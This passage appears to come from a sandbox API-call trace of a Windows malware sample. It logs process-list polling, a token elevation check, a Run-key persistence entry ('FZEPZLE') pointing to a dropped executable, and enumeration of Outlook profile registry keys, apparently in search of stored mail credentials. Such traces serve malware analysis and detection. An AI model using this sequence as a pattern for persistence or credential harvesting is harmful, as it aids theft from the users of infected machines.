RegionSize=0xdea54*=0x20000) returned 0x0 [0285.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0285.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0285.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0285.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0285.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0285.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0285.218] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdea50 | out: TokenHandle=0xdea50*=0x1e8) returned 0x0 [0285.218] NtQueryInformationToken (in: TokenHandle=0x1e8, TokenInformationClass=0x14, TokenInformation=0xdea48, TokenInformationLength=0x4, ReturnLength=0xdea4c | out: TokenInformation=0xdea48, ReturnLength=0xdea4c) returned 0x0 [0285.218] NtClose (Handle=0x1e8) returned 0x0 [0285.233] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.234] NtCreateFile (in: FileHandle=0xdea40, DesiredAccess=0x12019f, ObjectAttributes=0xdea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea40*=0x0, IoStatusBlock=0xdea28*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.236] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b9c0) returned 1 [0285.236] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea10, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.236] NtCreateFile (in: FileHandle=0xdea30, DesiredAccess=0x120089, ObjectAttributes=0xde9f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea18, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea30*=0x0, IoStatusBlock=0xdea18*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.236] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b9c0) returned 1 [0285.237] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde620 | out: TokenHandle=0xde620*=0x1e8) returned 0x0 [0285.237] NtQueryInformationToken (in: TokenHandle=0x1e8, TokenInformationClass=0x1, TokenInformation=0xdde18, TokenInformationLength=0x400, ReturnLength=0xde618 | out: TokenInformation=0xdde18, ReturnLength=0xde618) returned 0x0 [0285.238] ConvertSidToStringSidW (in: Sid=0xdde20*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde61c | out: StringSid=0xde61c*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0285.238] NtClose (Handle=0x1e8) returned 0x0 [0285.387] NtCreateKey (in: KeyHandle=0xdea58, DesiredAccess=0x2021f, ObjectAttributes=0xde61c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea58*=0x0) returned 0xc0000022 [0285.418] NtCreateKey (in: KeyHandle=0xdea58, DesiredAccess=0x2021f, ObjectAttributes=0xde61c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea58*=0x1e8) returned 0x0 [0285.453] NtSetValueKey (in: KeyHandle=0x1e8, ValueName="FZEPZLE", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", DataSize=0x50 | out: Data="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe") returned 0x0 [0285.457] NtClose (Handle=0x1e8) returned 0x0 [0285.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.457] NtCreateFile (in: FileHandle=0xdea44, DesiredAccess=0x12019f, ObjectAttributes=0xdea0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea44*=0x0, IoStatusBlock=0xdea2c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.458] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b9c0) returned 1 [0285.458] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea14, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.458] NtCreateFile (in: FileHandle=0xdea34, DesiredAccess=0x120089, ObjectAttributes=0xde9fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea1c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea34*=0x0, IoStatusBlock=0xdea1c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.458] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b9c0) returned 1 [0285.479] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde3dc | out: TokenHandle=0xde3dc*=0x1e8) returned 0x0 [0285.479] NtQueryInformationToken (in: TokenHandle=0x1e8, TokenInformationClass=0x1, TokenInformation=0xddbd4, TokenInformationLength=0x400, ReturnLength=0xde3d4 | out: TokenInformation=0xddbd4, ReturnLength=0xde3d4) returned 0x0 [0285.479] ConvertSidToStringSidW (in: Sid=0xddbdc*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde3d8 | out: StringSid=0xde3d8*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0285.479] NtClose (Handle=0x1e8) returned 0x0 [0285.479] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x0) returned 0xc0000034 [0285.479] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3d0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x0) returned 0xc0000034 [0285.480] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x1e8) returned 0x0 [0285.480] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogrc.ini", NtPathName=0xde2c8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.480] NtCreateFile (in: FileHandle=0xde2e8, DesiredAccess=0x120089, ObjectAttributes=0xde2b0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde2d0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde2e8*=0x0, IoStatusBlock=0xde2d0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.481] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505b20) returned 1 [0285.484] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.485] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.485] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.485] NtClose (Handle=0x21c) returned 0x0 [0285.485] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.485] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.485] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.485] NtClose (Handle=0x21c) returned 0x0 [0285.485] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.485] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.485] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.485] NtClose (Handle=0x21c) returned 0x0 [0285.485] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.486] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.486] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.486] NtClose (Handle=0x21c) returned 0x0 [0285.486] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x4, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.487] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.487] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.487] NtClose (Handle=0x21c) returned 0x0 [0285.487] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x5, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.487] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.487] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.487] NtClose (Handle=0x21c) returned 0x0 [0285.487] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x6, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.487] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.488] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.488] NtClose (Handle=0x21c) returned 0x0 [0285.488] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x7, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.488] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.488] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.488] NtClose (Handle=0x21c) returned 0x0 [0285.488] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x8, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.488] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.488] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0285.488] NtClose (Handle=0x21c) returned 0x0 [0285.488] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0x9, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0285.489] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0285.489] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x0 [0285.930] NtCreateKey (in: KeyHandle=0xde3f0, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f0*=0x220) returned 0x0 [0285.934] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.934] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.948] RtlIntegerToChar (in: Value=0xfde888b0, Base=0x0, Length=0x20, String=0xdd708 | out: String="4259874992") returned 0x0 [0285.949] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.949] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x3, 